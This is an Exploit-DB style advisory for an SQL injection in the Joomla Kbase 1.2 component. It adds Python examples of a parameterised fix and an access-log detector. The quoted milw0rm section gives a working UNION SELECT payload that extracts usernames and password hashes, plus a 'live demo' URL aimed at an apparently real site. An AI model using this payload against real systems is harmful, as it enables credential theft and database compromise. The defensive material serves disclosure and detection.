Vendor: Kbase
By: H!tm@N
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: Kbase
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla:kbase
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2008

Joomla Component Kbase SQL Injection Vulnerability

An SQL injection vulnerability exists in version 1.2 of the Joomla component Kbase (com_kbase). The flaw is caused by insufficient sanitization of user-supplied input to the 'id' parameter of the 'index.php' script. An attacker can exploit it by sending a specially crafted HTTP request that carries malicious SQL in that parameter, gaining access to sensitive information stored in the database.

Mitigation:

Validate all input so that untrusted data cannot enter the system: every input value should be checked and filtered for malicious content before it is used. Upgrading to the latest version of the application is also recommended.
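The following is an added example, not code from the Kbase component or from Joomla. It uses a constructed SQLite database with a hypothetical article table and a `jos_users` stand-in to contrast the vulnerable pattern the advisory describes (the request's `id` value concatenated into the query) with a hardened lookup that rejects anything but a positive integer and binds the value as a parameter. The injected value is the advisory's UNION form adapted to SQLite syntax (`||` instead of `concat`); the table and column names are assumptions.

```python
import re
import sqlite3

# Constructed demo database: a minimal stand-in for a Joomla install with one
# article table for the component and a jos_users table. Not the real schema.
def build_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE kbase_article (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO kbase_article VALUES (1, 'Getting started', 'Public article body');
        INSERT INTO jos_users VALUES (62, 'admin', 'constructed-hash-value');
        """
    )
    return conn


# The advisory's payload shape, rewritten for SQLite (string concatenation
# with || instead of MySQL's concat()). Column count matches the query below.
INJECTED_ID = "-1 UNION SELECT 'x', username || ':' || password FROM jos_users--"

# Joomla article ids are positive integers; anything else is rejected outright.
ID_RE = re.compile(r"^[1-9][0-9]{0,9}$")


def validate_article_id(raw):
    """Return the id as an int, or None if the value is not a positive integer."""
    if raw is None or not ID_RE.fullmatch(raw):
        return None
    return int(raw)


def lookup_article_unsafe(conn, raw_id):
    """Hypothetical vulnerable pattern: the request value is pasted into SQL."""
    sql = f"SELECT title, body FROM kbase_article WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()


def lookup_article_safe(conn, raw_id):
    """Hardened lookup: validate first, then bind the value as a parameter."""
    article_id = validate_article_id(raw_id)
    if article_id is None:
        return None  # caller answers 400/404; no query is ever built
    return conn.execute(
        "SELECT title, body FROM kbase_article WHERE id = ?", (article_id,)
    ).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    print("safe, id=1     :", lookup_article_safe(db, "1"))
    print("safe, injected :", lookup_article_safe(db, INJECTED_ID))
    print("unsafe, injected:", lookup_article_unsafe(db, INJECTED_ID))
```

The allow-list check is the cheap part; the parameter binding is what makes the query structure fixed regardless of input, so the fix does not depend on the regex being perfect.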
Source

Exploit-DB raw data:

#############################################################################
#                                                                           #
#            Joomla Component Kbase SQL Injection Vulnerability             #
#                                                                           #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Kbase (com_kbase)"  
[~] Version:       "1.2"
[~] Date:          "?.?.2008"
[~] Author:        "John Messingham Development Services"
[~] Author E-mail: "mail@jmds.eu"
[~] Author URL:    "www.jmds.eu"

########################################

[~] Exploit: /index.php?option=com_kbase&view=article&id=[SQL]

[~] Example: /index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

########################################

[~] Live Demo: http://netserv.ncesd.org/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

# milw0rm.com [2008-10-24]
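As an added detection example (not part of the advisory), the script below scans Apache combined-format access log lines for requests to `option=com_kbase` whose `id` parameter is not a plain integer, and labels those that contain SQL keywords. The log lines, client addresses and timestamps are constructed for the demo; the third line carries a request shaped like the advisory's example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log sample (Apache combined format). Addresses are from
# documentation ranges; the third request mirrors the advisory's example.
SAMPLE_LOG = """\
198.51.100.7 - - [24/Oct/2008:10:01:02 +0000] "GET /index.php?option=com_kbase&view=article&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Oct/2008:10:01:09 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.44 - - [24/Oct/2008:10:04:31 +0000] "GET /index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users-- HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.44 - - [24/Oct/2008:10:05:02 +0000] "GET /index.php?option=com_kbase&view=article&id=1%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INT_RE = re.compile(r"^[0-9]{1,10}$")
SQL_HINT = re.compile(r"\b(union|select|from|concat)\b|--", re.IGNORECASE)


def inspect_request(target):
    """Return a finding dict for a com_kbase request with a suspicious id, else None."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes %XX and '+'
    if qs.get("option", [""])[0] != "com_kbase":
        return None
    for value in qs.get("id", []):
        if INT_RE.fullmatch(value):
            continue
        reason = "sql keywords" if SQL_HINT.search(value) else "non-numeric id"
        return {"id": value, "reason": reason}
    return None


def scan_log(text):
    """Scan log text line by line; return findings with client, time and status."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hit = inspect_request(m["target"])
        if hit:
            findings.append(
                {"ip": m["ip"], "ts": m["ts"], "status": m["status"], **hit}
            )
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} {f['reason']}: id={f['id']!r}")
```

Decoding the query string before matching matters: the `+` and `%27` in the sample would defeat a naive substring check on the raw request line. A 200 response to a request with SQL keywords in `id` is the case worth escalating, since it suggests the injected query executed rather than erroring out.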